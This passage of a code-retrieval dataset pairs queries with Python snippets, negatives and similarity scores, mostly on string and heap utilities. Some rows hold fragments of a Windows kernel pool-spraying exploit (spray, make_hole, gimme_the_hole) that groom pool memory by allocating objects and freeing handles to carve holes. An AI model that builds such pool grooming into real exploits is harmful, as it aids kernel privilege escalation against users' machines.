prefix):\r\n length_prefix = len(prefix)\r\n length_word = len(word)\r\n \r\n if length_prefix > length_word:\r\n return prefix\r\n\r\n #print(word[:length_prefix])\r\n word = prefix + word[length_prefix:]\r\n\r\n return word", "def uniquely_shorten(string, length):\n\n if len(string) <= length and not (len(string) == length and\n string.startswith(SHORTENED_PREFIX)):\n return string\n\n h = hashlib.sha256()\n h.update(\"%s \" % length)\n h.update(string)\n hash_text = h.hexdigest()\n\n return SHORTENED_PREFIX + hash_text[:length-len(SHORTENED_PREFIX)]", "def lt_3(self, index):\n word = self.get_prev_word(index, orignal=True)\n return len(word) < 3", "def front_back(string):\n pass", "def trunc_string(string, length=50):\n if len(string)>length:\n return \"%s...\" % string[:length-3]\n else:\n return string", "def strprevling(prefix):\n if not prefix:\n ## There is no prevling for the null string\n return prefix\n s = prefix[:-1]\n c = ord(prefix[-1])\n if c > 0:\n s += unichr(c - 1) + unichr(0xffff)\n return s", "def sameThreeCharStartPredicate(field):\n\n if len(field) < 3:\n return ()\n\n return (field[:3], )", "def shorten(string, maxLen, last):\n if len(string) <= maxLen:\n return string\n string = string[:maxLen]\n string = string[::-1]\n found = re.search(re.escape(last), string)\n if found:\n string = string[found.start():]\n string = string[::-1]\n return string" ]
[ "0.65979856", "0.63354737", "0.6301724", "0.6301724", "0.6243326", "0.6228791", "0.6216042", "0.6029894", "0.5991379", "0.59705275", "0.5832232", "0.5798461", "0.5776897", "0.57416624", "0.56858873", "0.566699", "0.5666881", "0.56637913", "0.56535786", "0.5597575", "0.5541995", "0.5528354", "0.5507345", "0.5491778", "0.54658175", "0.545906", "0.54579306", "0.54447806", "0.54267716", "0.5424306" ]
0.8477923
0
Spray the heap with objects which will allow us to create the required holes later
def spray(required_hole_size): global pool_object_handles good_object = find_object_to_spray(required_hole_size) for i in range(SPRAY_COUNT): pool_object_handles.append(allocate_object(good_object, i)) print "[+] Spray done!" return good_object
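In the exploit flow, spray() is paired with make_hole() below; a combining helper (the same shape as the gimme_the_hole negative listed further down) would be:

def gimme_the_hole(required_hole_size):
    good_object = spray(required_hole_size)
    make_hole(required_hole_size, good_object)
    return good_object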
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self):\n self.heap = []", "def __init__(self):\n self.heap = []", "def __init__(self):\n self.heap = []", "def __init__(self):\n self.heap = []\n self.stack = []", "def __init__(self):\n self.heap1 = []\n self.heap2 = []\n self.size = 0", "def __init__(self):\n self.heap = [None]", "def __init__(self):\n self.stack = []\n self.heap = []", "def __init__(self):\n\n self.container2 = []\n heapq.heapify(self.container2)", "def gimme_the_hole(required_hole_size):\n\tgood_object = spray(required_hole_size)\n\tmake_hole(required_hole_size, good_object)\n\treturn good_object", "def __init__(self):\n self.stream_data_left = []\n heapq.heapify(self.stream_data_left)\n self.stream_data_right = []\n heapq.heapify(self.stream_data_right)", "def __init__(self):\n self.heapList = [0]\n self.currentSize = 0", "def __init__(self):\n super(_SerializedEventHeap, self).__init__()\n self._heap = []\n self.data_size = 0", "def make_hole(required_hole_size, good_object):\n\tglobal pool_object_handles\n\tnr_to_free = required_hole_size / kernel_object_sizes[good_object]\n\tfor i in range(0, SPRAY_COUNT,16):\n\t\tfor j in range(0,nr_to_free):\n\t\t\tkernel32.CloseHandle(pool_object_handles[i + j])\n\t\t\tpool_object_handles[i + j] = None\n\tprint \"[+] Making holes done!\"", "def __init__(self):\n # max heap\n self.small = []\n # min heap\n self.large = []", "def __init__(self):\n self.max_heap = MaxHeap()\n self.min_heap = MinHeap()", "def __init__(self):\r\n self.maxHeap = []\r\n self.minHeap = []", "def __init__(self):\n self.min_heap = []\n self.max_heap = []\n self.size_max, self.size_min = 0, 0", "def __init__(self):\n self.__max_heap = []\n self.__min_heap = []", "def __init__(self):\n # Initialize a new binary min heap to store the items\n self.heap = MinHeap()", "def __init__(self):\n self.min_heap = []\n self.max_heap = []", "def __init__(self, *args):\n this = _ida_hexrays.new_hexwarns_t(*args)\n try: self.this.append(this)\n except: self.this = this", "def __init__(self, x):\n self.elements = x\n self._heapify()", "def heapify(self):\n heapify(self._heap)", "def __init__(self, heap_used=None, heap_committed=None, heap_max=None, non_heap_used=None, non_heap_committed=None, non_heap_max=None, direct_count=None, direct_used=None, direct_max=None, mapped_count=None, mapped_used=None, mapped_max=None, memory_segments_available=None, memory_segments_total=None, garbage_collectors=None): # noqa: E501 # noqa: E501\n self._heap_used = None\n self._heap_committed = None\n self._heap_max = None\n self._non_heap_used = None\n self._non_heap_committed = None\n self._non_heap_max = None\n self._direct_count = None\n self._direct_used = None\n self._direct_max = None\n self._mapped_count = None\n self._mapped_used = None\n self._mapped_max = None\n self._memory_segments_available = None\n self._memory_segments_total = None\n self._garbage_collectors = None\n self.discriminator = None\n if heap_used is not None:\n self.heap_used = heap_used\n if heap_committed is not None:\n self.heap_committed = heap_committed\n if heap_max is not None:\n self.heap_max = heap_max\n if non_heap_used is not None:\n self.non_heap_used = non_heap_used\n if non_heap_committed is not None:\n self.non_heap_committed = non_heap_committed\n if non_heap_max is not None:\n self.non_heap_max = non_heap_max\n if direct_count is not None:\n self.direct_count = direct_count\n if direct_used is not None:\n self.direct_used = direct_used\n if direct_max is not None:\n self.direct_max = direct_max\n if mapped_count is not None:\n 
self.mapped_count = mapped_count\n if mapped_used is not None:\n self.mapped_used = mapped_used\n if mapped_max is not None:\n self.mapped_max = mapped_max\n if memory_segments_available is not None:\n self.memory_segments_available = memory_segments_available\n if memory_segments_total is not None:\n self.memory_segments_total = memory_segments_total\n if garbage_collectors is not None:\n self.garbage_collectors = garbage_collectors", "def make_objects(self):\n pass", "def __init__(self, heap=[]):\n\n # logger_cagada.debug(\"pero si el orig heap %s\" % heap)\n heapq.heapify(heap)\n # logger_cagada.debug(\"a cihnga el heap %s\" % heap)\n self.heap = heap\n self.entry_finder = dict({i[-1]: i for i in heap})\n # logger_cagada.debug(\"el finder es %s\" % self.entry_finder)\n self.REMOVED = sys.maxsize", "def __init__(self):\n self.max_heap = list()\n self.min_heap = list()", "def testOneSize(self):\n hd = HeapDict(size=1)\n hd.push('a', 2)\n hd.push('a', 1)\n hd.push('b', 3)\n hd.push('b', 4)\n self.assertEqual(hd.get_result(), {'a': [2], 'b': [4]})", "def __init__(self):\n self.minheap = []\n self.maxheap = []", "def __init__(self):\n self.minheap = []\n self.maxheap = []\n self.len_min = self.len_max = 0" ]
[ "0.65388066", "0.65388066", "0.65388066", "0.6477379", "0.6462962", "0.64020336", "0.63523936", "0.6230689", "0.619596", "0.61713964", "0.613623", "0.5981633", "0.59274656", "0.5911174", "0.5850001", "0.5822494", "0.5817438", "0.5740892", "0.57295054", "0.57109493", "0.56985694", "0.5667988", "0.5665564", "0.56588876", "0.56446093", "0.56414336", "0.56330305", "0.5618302", "0.5602727", "0.5594154" ]
0.75047916
0
Making holes in the sprayed kernel
def make_hole(required_hole_size, good_object):
    global pool_object_handles
    # Number of adjacent sprayed objects to free so the run coalesces into
    # one pool hole of the requested size (Python 2: '/' on ints floors).
    nr_to_free = required_hole_size / kernel_object_sizes[good_object]
    # Walk the spray in groups of 16: free the first nr_to_free handles of
    # each group and keep the rest allocated, so every hole stays bounded
    # by still-live objects.
    for i in range(0, SPRAY_COUNT, 16):
        for j in range(0, nr_to_free):
            kernel32.CloseHandle(pool_object_handles[i + j])
            pool_object_handles[i + j] = None
    print "[+] Making holes done!"
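The routine above releases the first nr_to_free handles of every 16-object group, so each freed run coalesces into one hole of the requested size while the surviving neighbours pin its boundaries. A minimal, platform-independent sketch of that index pattern (the constants and the "Event" object name below are illustrative assumptions, not values from the source):

# Sketch: simulate which spray indices make_hole would free.
SPRAY_COUNT = 64                       # sprayed allocations (real sprays use thousands)
kernel_object_sizes = {"Event": 0x40}  # hypothetical pool size of one sprayed object

def hole_indices(required_hole_size, good_object):
    """Return the spray indices make_hole would close to carve the holes."""
    nr_to_free = required_hole_size // kernel_object_sizes[good_object]
    freed = []
    for i in range(0, SPRAY_COUNT, 16):
        freed.extend(range(i, i + nr_to_free))
    return freed

print(hole_indices(0x100, "Event"))  # [0, 1, 2, 3, 16, 17, 18, 19, 32, ...]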
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setHolesCoordinates(self):\r\n # productive\r\n profprint()\r\n self.p = [[0 for j in range(63)] for j in range(3)]\r\n self.p[0][0] = 35\r\n self.p[1][0] = 34\r\n self.p[0][1] = 25\r\n self.p[1][1] = 36.679\r\n self.p[0][2] = 17.679\r\n self.p[1][2] = 44\r\n self.p[0][3] = 15\r\n self.p[1][3] = 54\r\n self.p[0][4] = 17.679\r\n self.p[1][4] = 64\r\n self.p[0][5] = 25\r\n self.p[1][5] = 71.321\r\n self.p[0][6] = 35\r\n self.p[1][6] = 74\r\n self.p[0][7] = 45\r\n self.p[1][7] = 71.321\r\n self.p[0][8] = 52.321\r\n self.p[1][8] = 64\r\n self.p[0][9] = 55\r\n self.p[1][9] = 54\r\n self.p[0][10] = 52.321\r\n self.p[1][10] = 44\r\n self.p[0][11] = 45\r\n self.p[1][11] = 36.679\r\n self.p[0][12] = 29.791\r\n self.p[1][12] = 24.456\r\n self.p[0][13] = 20\r\n self.p[1][13] = 28.019\r\n self.p[0][14] = 12.019\r\n self.p[1][14] = 34.716\r\n self.p[0][15] = 6.809\r\n self.p[1][15] = 43.739\r\n self.p[0][16] = 5\r\n self.p[1][16] = 54\r\n self.p[0][17] = 6.809\r\n self.p[1][17] = 64.261\r\n self.p[0][18] = 12.019\r\n self.p[1][18] = 73.284\r\n self.p[0][19] = 20\r\n self.p[1][19] = 79.981\r\n self.p[0][20] = 29.791\r\n self.p[1][20] = 83.544\r\n self.p[0][21] = 40.209\r\n self.p[1][21] = 83.544\r\n self.p[0][22] = 50\r\n self.p[1][22] = 79.981\r\n self.p[0][23] = 57.981\r\n self.p[1][23] = 73.284\r\n self.p[0][24] = 63.191\r\n self.p[1][24] = 64.262\r\n self.p[0][25] = 65\r\n self.p[1][25] = 54\r\n self.p[0][26] = 63.191\r\n self.p[1][26] = 43.739\r\n self.p[0][27] = 57.981\r\n self.p[1][27] = 34.716\r\n self.p[0][28] = 50\r\n self.p[1][28] = 28.019\r\n self.p[0][29] = 40.209\r\n self.p[1][29] = 24.456\r\n self.p[0][30] = 35\r\n self.p[1][30] = 14\r\n self.p[0][31] = 24.647\r\n self.p[1][31] = 15.363\r\n self.p[0][32] = 15\r\n self.p[1][32] = 19.359\r\n self.p[0][33] = 15\r\n self.p[1][33] = 88.641\r\n self.p[0][34] = 24.647\r\n self.p[1][34] = 92.637\r\n self.p[0][35] = 35\r\n self.p[1][35] = 94\r\n self.p[0][36] = 45.353\r\n self.p[1][36] = 92.637\r\n self.p[0][37] = 55\r\n self.p[1][37] = 88.641\r\n self.p[0][38] = 55\r\n self.p[1][38] = 19.359\r\n self.p[0][39] = 45.353\r\n self.p[1][39] = 15.363\r\n self.p[0][40] = 30.642\r\n self.p[1][40] = 4.19\r\n self.p[0][41] = 22.059\r\n self.p[1][41] = 5.704\r\n self.p[0][42] = 22.059\r\n self.p[1][42] = 102.296\r\n self.p[0][43] = 30.642\r\n self.p[1][43] = 103.81\r\n self.p[0][44] = 39.358\r\n self.p[1][44] = 103.81\r\n self.p[0][45] = 47.941\r\n self.p[1][45] = 102.296\r\n self.p[0][46] = 47.941\r\n self.p[1][46] = 5.704\r\n self.p[0][47] = 39.358\r\n self.p[1][47] = 4.19\r\n self.p[0][48] = 29.7\r\n self.p[1][48] = 44.82\r\n self.p[0][49] = 24.4\r\n self.p[1][49] = 54\r\n self.p[0][50] = 29.7\r\n self.p[1][50] = 63.18\r\n self.p[0][51] = 40.3\r\n self.p[1][51] = 63.18\r\n self.p[0][52] = 45.6\r\n self.p[1][52] = 54\r\n self.p[0][53] = 40.3\r\n self.p[1][53] = 44.82\r\n self.p[0][54] = 35\r\n self.p[1][54] = 54\r\n self.p[0][55] = 9\r\n self.p[1][55] = 12\r\n self.p[0][56] = 5\r\n self.p[1][56] = 18\r\n self.p[0][57] = 5\r\n self.p[1][57] = 90\r\n self.p[0][58] = 9\r\n self.p[1][58] = 96\r\n self.p[0][59] = 61\r\n self.p[1][59] = 96\r\n self.p[0][60] = 65\r\n self.p[1][60] = 90\r\n self.p[0][61] = 65\r\n self.p[1][61] = 18\r\n self.p[0][62] = 61\r\n self.p[1][62] = 12\r\n\r\n return self.p", "def setHolesCoordinates(self):\n #productive\n profprint()\n self.p = [[0 for j in range(63)] for j in range(3)]\n self.p[0][0]=35\n self.p[1][0]=34\n self.p[0][1]=25\n self.p[1][1]=36.679\n self.p[0][2]=17.679\n self.p[1][2]=44\n self.p[0][3]=15\n 
self.p[1][3]=54\n self.p[0][4]=17.679\n self.p[1][4]=64\n self.p[0][5]=25\n self.p[1][5]=71.321\n self.p[0][6]=35\n self.p[1][6]=74\n self.p[0][7]=45\n self.p[1][7]=71.321\n self.p[0][8]=52.321\n self.p[1][8]=64\n self.p[0][9]=55\n self.p[1][9]=54\n self.p[0][10]=52.321\n self.p[1][10]=44\n self.p[0][11]=45\n self.p[1][11]=36.679\n self.p[0][12]=29.791\n self.p[1][12]=24.456\n self.p[0][13]=20\n self.p[1][13]=28.019\n self.p[0][14]=12.019\n self.p[1][14]=34.716\n self.p[0][15]=6.809\n self.p[1][15]=43.739\n self.p[0][16]=5\n self.p[1][16]=54\n self.p[0][17]=6.809\n self.p[1][17]=64.261\n self.p[0][18]=12.019\n self.p[1][18]=73.284\n self.p[0][19]=20\n self.p[1][19]=79.981\n self.p[0][20]=29.791\n self.p[1][20]=83.544\n self.p[0][21]=40.209\n self.p[1][21]=83.544\n self.p[0][22]=50\n self.p[1][22]=79.981\n self.p[0][23]=57.981\n self.p[1][23]=73.284\n self.p[0][24]=63.191\n self.p[1][24]=64.262\n self.p[0][25]=65\n self.p[1][25]=54\n self.p[0][26]=63.191\n self.p[1][26]=43.739\n self.p[0][27]=57.981\n self.p[1][27]=34.716\n self.p[0][28]=50\n self.p[1][28]=28.019\n self.p[0][29]=40.209\n self.p[1][29]=24.456\n self.p[0][30]=35\n self.p[1][30]=14\n self.p[0][31]=24.647\n self.p[1][31]=15.363\n self.p[0][32]=15\n self.p[1][32]=19.359\n self.p[0][33]=15\n self.p[1][33]=88.641\n self.p[0][34]=24.647\n self.p[1][34]=92.637\n self.p[0][35]=35\n self.p[1][35]=94\n self.p[0][36]=45.353\n self.p[1][36]=92.637\n self.p[0][37]=55\n self.p[1][37]=88.641\n self.p[0][38]=55\n self.p[1][38]=19.359\n self.p[0][39]=45.353\n self.p[1][39]=15.363\n self.p[0][40]=30.642\n self.p[1][40]=4.19\n self.p[0][41]=22.059\n self.p[1][41]=5.704\n self.p[0][42]=22.059\n self.p[1][42]=102.296\n self.p[0][43]=30.642\n self.p[1][43]=103.81\n self.p[0][44]=39.358\n self.p[1][44]=103.81\n self.p[0][45]=47.941\n self.p[1][45]=102.296\n self.p[0][46]=47.941\n self.p[1][46]=5.704\n self.p[0][47]=39.358\n self.p[1][47]=4.19\n self.p[0][48]=29.7\n self.p[1][48]=44.82\n self.p[0][49]=24.4\n self.p[1][49]=54\n self.p[0][50]=29.7\n self.p[1][50]=63.18\n self.p[0][51]=40.3\n self.p[1][51]=63.18\n self.p[0][52]=45.6\n self.p[1][52]=54\n self.p[0][53]=40.3\n self.p[1][53]=44.82\n self.p[0][54]=35\n self.p[1][54]=54\n self.p[0][55]=9\n self.p[1][55]=12\n self.p[0][56]=5\n self.p[1][56]=18\n self.p[0][57]=5\n self.p[1][57]=90\n self.p[0][58]=9\n self.p[1][58]=96\n self.p[0][59]=61\n self.p[1][59]=96\n self.p[0][60]=65\n self.p[1][60]=90\n self.p[0][61]=65\n self.p[1][61]=18\n self.p[0][62]=61\n self.p[1][62]=12\n\n return self.p", "def applyKernelToPoints(image,pts,kernel,border_type='BLACK'):\n \n \n pts=np.asarray(pts)\n image=np.asarray(image)\n image.shape\n if len(image.shape)>2:\n grayscale=False\n shaperesult=(len(pts),image.shape[2])\n elif len(image.shape)==1:\n image=image.reshape(1,image.shape[0])\n shaperesult=len(pts)\n grayscale=True\n\n else:\n grayscale=True\n\n # Kernel dimensions - they are integers\n krows=kernel.shape[0] \n kcols=kernel.shape[1]\n\n if krows%2==0:\n # Is even\n ldrows=(krows/2)-1\n udrows=krows/2\n \n else:\n # Is odd\n ldrows=krows/2\n udrows=krows/2\n\n if kcols%2==0:\n # Is even\n ldcols=(kcols/2)-1\n udcols=kcols/2\n else:\n # Is odd\n ldcols=kcols/2\n udcols=kcols/2\n\n #------------------------------------\n # ADD FRAME TO THE ORIGINAL IMAGE\n #------------------------------------\n\n dummyM=image.shape[0]+krows-1\n dummyN=image.shape[1]+kcols-1\n \n if grayscale==True:\n dummyimage=np.asarray(np.zeros((dummyM,dummyN)))\n \n else:\n 
dummyimage=np.asarray(np.zeros((dummyM,dummyN,image.shape[2])))\n\n if border_type==\"WHITE\":\n dummyimage=dummyimage+255\n\n elif border_type==\"ANTIALIAS\":\n # Fills top border\n dummyimage[0:ldrows,ldcols:ldcols+image.shape[1]]=image[image.shape[0]-ldrows:image.shape[0],:]\n\n # Fills bottom border\n dummyimage[(ldrows+image.shape[0]):,ldcols:(ldcols+image.shape[1])]=image[0:udrows,:]\n \n # Fills left border\n dummyimage[ldrows:ldrows+image.shape[0],0:ldcols]=image[:,image.shape[1]-ldcols:]\n\n # Fills right border\n dummyimage[ldrows:ldrows+image.shape[0],(ldcols+image.shape[1]):]=image[:,0:udcols]\n \n # Fills top, left corner\n dummyimage[0:ldrows,0:ldcols]=image[image.shape[0]-ldrows,image.shape[1]-ldcols]\n\n # Fills bottom, left corner\n dummyimage[(ldrows+image.shape[0]):,0:ldcols]=image[0:udrows,(image.shape[1]-ldcols):]\n \n # Fills top, right corner\n dummyimage[0:ldrows,(ldcols+image.shape[1]):]=image[(image.shape[0]-ldrows):,0:udcols]\n \n # Fills bottom, right corner\n dummyimage[(ldrows+image.shape[0]):,(ldcols+image.shape[1]):]=image[0:udrows,0:udcols]\n \n dummyimage[ldrows:ldrows+image.shape[0],ldcols:ldcols+image.shape[1]]=image \n \n result=np.asarray(np.zeros(shaperesult))\n \n pts[:,0]=pts[:,0]+ldrows\n pts[:,1]=pts[:,1]+ldcols\n \n for k in range(len(pts)):\n total=0\n \n for i in range(-ldrows,udrows+1):\n for j in range(-ldcols,udcols+1):\n total=total+dummyimage[i+pts[k,0],j+pts[k,1]]*kernel[i+ldrows,j+ldcols]\n \n \n result[k]=total\n \n \n return result", "def watershed(mask, img, plotImage = False, kernelSize = None):\n imgCopy = img.copy()\n maskCopy = np.array(mask.copy(), dtype=np.uint8)\n \n if kernelSize is None:\n kernelSize = 2\n\n # Finding sure foreground area\n #dist_transform = cv2.distanceTransform(mask, cv2.DIST_L2, 5)\n #ret, sure_fg = cv2.threshold(dist_transform,0.3*dist_transform.max(),255,0) #change the second argument to change the sensitivity \n maskClosed = skimage.morphology.closing(np.array(maskCopy, dtype=np.uint8))\n maskClosed = skimage.morphology.closing(np.array(maskClosed, dtype=np.uint8))\n kernel = np.ones((kernelSize,kernelSize), np.uint8)\n # maskCopy = img_as_bool(maskCopy)\n sure_fg = cv2.erode(maskClosed, kernel, iterations = 2) ###\n sure_fg = skimage.morphology.closing(np.array(sure_fg, dtype=np.uint8))\n # kernel = np.ones((2,2), np.uint8)\n # sure_fg = binary_closing(sure_fg, kernel)\n \n # sure background area\n #kernel = np.ones((5, 5), np.uint8)\n #sure_bg = cv2.dilate(mask, kernel, iterations = 1)\n sure_fg_bool = 1 - img_as_bool(sure_fg)\n # sure_bg = np.uint8(1 - morphology.medial_axis(sure_fg_bool)) ### \n sure_bg = np.uint8(1 - morphology.skeletonize(sure_fg_bool))\n sure_bg[0, :] = 1\n sure_bg[-1, :] = 1\n sure_bg[:, 0] = 1\n sure_bg[:, -1] = 1\n \n # Finding unknown region\n sure_fg = np.uint8(sure_fg)\n unknown = cv2.subtract(sure_bg, sure_fg)\n \n if plotImage:\n plt.figure()\n plt.imshow(sure_fg)\n plt.title(\"Inner Marker\")\n plt.figure()\n plt.imshow(sure_bg)\n plt.title(\"Outer Marker\")\n plt.figure()\n plt.imshow(unknown)\n plt.title(\"Unknown\")\n \n # Marker labelling\n ret, markers = cv2.connectedComponents(sure_fg)\n\n # Add one to all labels so that sure background is not 0, but 1\n markers = markers+1\n\n # Now, mark the region of unknown with zero\n markers[unknown==1] = 0\n \n if plotImage:\n plt.figure()\n plt.imshow(markers, cmap='jet')\n plt.title(\"Markers\")\n \n # Do watershed\n markers = cv2.watershed(imgCopy, markers)\n \n imgCopy[markers == -1] = [0, 255 ,0]\n\n if plotImage:\n 
plt.figure()\n plt.imshow(markers,cmap='jet')\n plt.title(\"Mask\")\n plt.figure()\n plt.imshow(img)\n plt.title(\"Original Image\")\n plt.figure()\n plt.imshow(imgCopy)\n plt.title(\"Marked Image\")\n plt.show()\n\n return markers", "def approching_blackhole():\n blackhole = BlackHole()\n Rs = 8.0\n D_list = np.round(10**np.linspace(np.log10(50), np.log10(100000), 30))\n blackhole.open(blackhole.img_name, size=2000)\n\n for D in D_list:\n blackhole.compute(Rs, D)\n blackhole.img_save()", "def erode(img, kernel_h, kernel_w):\n # kernel_w and kernel_h chosen to get 4 clear markers in first frame to set initial limb coordinates.\n \"\"\" if majority of kernel is blue, else erase\"\"\"\n y = 0\n print(frame_height)\n while y < frame_height - kernel_h:\n x = 0\n while x < frame_width - kernel_w:\n # where Red exist\n kernel = img[y:y+kernel_h, x:x+kernel_w, 2] > 0 + numpy.zeros((kernel_h, kernel_w))\n\n if numpy.all(kernel == 0):\n pass\n elif numpy.sum(kernel) < (kernel_w*kernel_h)*0.85:\n img[y:y+kernel_h, x:x+kernel_w, 1:3] = 0\n else:\n img[y:y+kernel_h, x:x+kernel_w, 2] = 255\n\n x += kernel_w\n y += kernel_h", "def fill_blind_pores(im):\n holes = find_disconnected_voxels(im)\n im[holes] = False\n return im", "def gimme_the_hole(required_hole_size):\n\tgood_object = spray(required_hole_size)\n\tmake_hole(required_hole_size, good_object)\n\treturn good_object", "def create_hard_blocks(self):\n for x in xrange(1, self.map_size[0], 2):\n for y in xrange(1, self.map_size[1], 2):\n self.create_hard_block_at(x, y)", "def glow_boundary(bound):\n assert bound < 4\n global layout\n temp = len(layout) - 1\n for i in range(bound, bound + len_square(bound)):\n for j in range(bound, bound + len_square(bound)): # TODO: assign this to a variable\t\n layout[i][j] = 1", "def focus_field_beam(shape = (128,128,128),\n units = (0.1,0.1,0.1),\n lam =.5, NA = .6, n0 = 1.,\n return_all_fields = False,\n n_integration_steps = 200):\n\n\n p = OCLProgram(absPath(\"kernels/psf_debye.cl\"),\n build_options = [\"-I\",absPath(\"kernels\"),\"-D\",\"INT_STEPS=%s\"%n_integration_steps])\n\n if np.isscalar(NA):\n NA = [0.,NA]\n \n Nx0, Ny0, Nz0 = shape\n dx, dy, dz = units\n\n #FIXME: the loop below does not yet work for odd inputs\n if not Nx0%2+Ny0%2+Nz0%2==0:\n raise NotImplementedError(\"odd shapes not supported yet\")\n\n\n alphas = np.arcsin(np.array(NA)/n0)\n assert len(alphas)%2 ==0\n\n # as we assume the psf to be symmetric, we just have to calculate each octant\n Nx = Nx0//2+1\n Ny = Ny0//2+1\n Nz = Nz0//2+1\n\n u_g = OCLArray.empty((Nz,Ny,Nx),np.float32)\n ex_g = OCLArray.empty(u_g.shape,np.complex64)\n ey_g = OCLArray.empty(u_g.shape,np.complex64)\n ez_g = OCLArray.empty(u_g.shape,np.complex64)\n\n alpha_g = OCLArray.from_array(alphas.astype(np.float32))\n\n \n p.run_kernel(\"debye_wolf\",u_g.shape[::-1],None,\n ex_g.data,ey_g.data,ez_g.data, u_g.data,\n np.float32(1.),np.float32(0.),\n np.float32(0.),np.float32(dx*(Nx-1.)),\n np.float32(0.),np.float32(dy*(Ny-1.)),\n np.float32(0.),np.float32(dz*(Nz-1.)),\n np.float32(lam), np.float32(n0),\n alpha_g.data, np.int32(len(alphas)))\n\n u = u_g.get()\n ex = ex_g.get()\n ey = ey_g.get()\n ez = ez_g.get()\n\n u_all = np.empty((Nz0,Ny0,Nx0),np.float32)\n ex_all = np.empty((Nz0,Ny0,Nx0),np.complex64)\n ey_all = np.empty((Nz0,Ny0,Nx0),np.complex64)\n ez_all = np.empty((Nz0,Ny0,Nx0),np.complex64)\n\n sx = [slice(0,Nx),slice(Nx,Nx0)]\n sy = [slice(0,Ny),slice(Ny,Ny0)]\n sz = [slice(0,Nz),slice(Nz,Nz0)]\n\n\n\n # spreading the calculated octant to the full volume\n for 
i,j,k in itertools.product([0,1],[0,1],[0,1]):\n\n # i, j, k = 0 indicates the + octant\n\n u_all[sz[1-i],sy[1-j],sx[1-k]] = u[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k]\n if i ==0:\n ex_all[sz[1-i],sy[1-j],sx[1-k]] = ex[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k]\n ey_all[sz[1-i],sy[1-j],sx[1-k]] = ey[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k]\n ez_all[sz[1-i],sy[1-j],sx[1-k]] = ez[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k]\n\n else:\n ex_all[sz[1-i],sy[1-j],sx[1-k]] = np.conjugate(ex[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k])\n ey_all[sz[1-i],sy[1-j],sx[1-k]] = np.conjugate(ey[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k])\n ez_all[sz[1-i],sy[1-j],sx[1-k]] = np.conjugate(ez[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k])\n\n if return_all_fields:\n return u_all, ex_all, ey_all, ez_all\n else:\n return u_all", "def sharpen(im):\n kernel = np.array([[-1, -1, -1], [-1, 9, -1], [-1, -1, -1]])\n im = cv2.filter2D(im, -1, kernel)\n return im", "def ghosal_edge(img,Ks,thr=1,thrmax=0.995,lmin = 0.5,phimin=1.4,thresholding=True, debug=False):\n\ttotaltime = time.time()\n\tkerneltime = time.time()\n\t# Ks must be odd\n\tif Ks%2 != 1:\n\t\tprint(\"Ks must be odd! Continuing with Ks = Ks-1\")\n\t\tKs = Ks-1\n\t# define the rectangular kernels\n\t#Vc00 = np.zeros((Ks,Ks),dtype=complex)\n\tVc11 = np.zeros((Ks,Ks),dtype=complex)\n\tVc20 = np.zeros((Ks,Ks),dtype=complex)\n\tofs = 1 *(1-1/Ks) # offset for centering kernel around 0,0\n\tfor i in range(Ks):\n\t\tfor j in range(Ks):\n\t\t\tKx = 2*j/Ks-ofs # limits of integration between -1 and 1\n\t\t\tKy = 2*i/Ks-ofs\n\t\t\tif Kx**2+Ky**2 <= 1: # only a circle\n\t\t\t\t#Vc00[i,j] = 1 # the conjugate of V00\n\t\t\t\tVc11[i,j] = Kx-Ky*1j # ...\n\t\t\t\tVc20[i,j] = 2*Kx**2+2*Ky**2-1\n\tkerneltime = time.time() - kerneltime\n\t\n\t# Kernel Plots\n\t#\tVCplot = Vc00\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real w K Vc00\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag w K Vc00\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tVCplot = Vc11\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real w K Vc11\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag w K Vc11\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tVCplot = Vc20\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real w K Vc20\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag w K Vc20\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t\n\t# do the convolution with the images to get the zernike moments\n\tAnorm = lambda n : (n+1)/np.pi\t# a normalization value\n\tconvolvetime = time.time()\n\t#A00 = scig.convolve2d(img,Vc00,mode='same')\n\t#\tA11 = Anorm(1)*scig.convolve2d(img,Vc11,mode='same')\n\t#\tA20 = Anorm(2)*scig.convolve2d(img,Vc20,mode='same')\n\tA11 = Anorm(1)*scig.oaconvolve(img,Vc11,mode='same')\n\tA20 = Anorm(2)*scig.oaconvolve(img,Vc20,mode='same')\n\tconvolvetime = time.time() - convolvetime\n\t# Plot Zernike moments\n\t#\tVCplot = A00\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real A00\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag A00\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tVCplot = A11\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real 
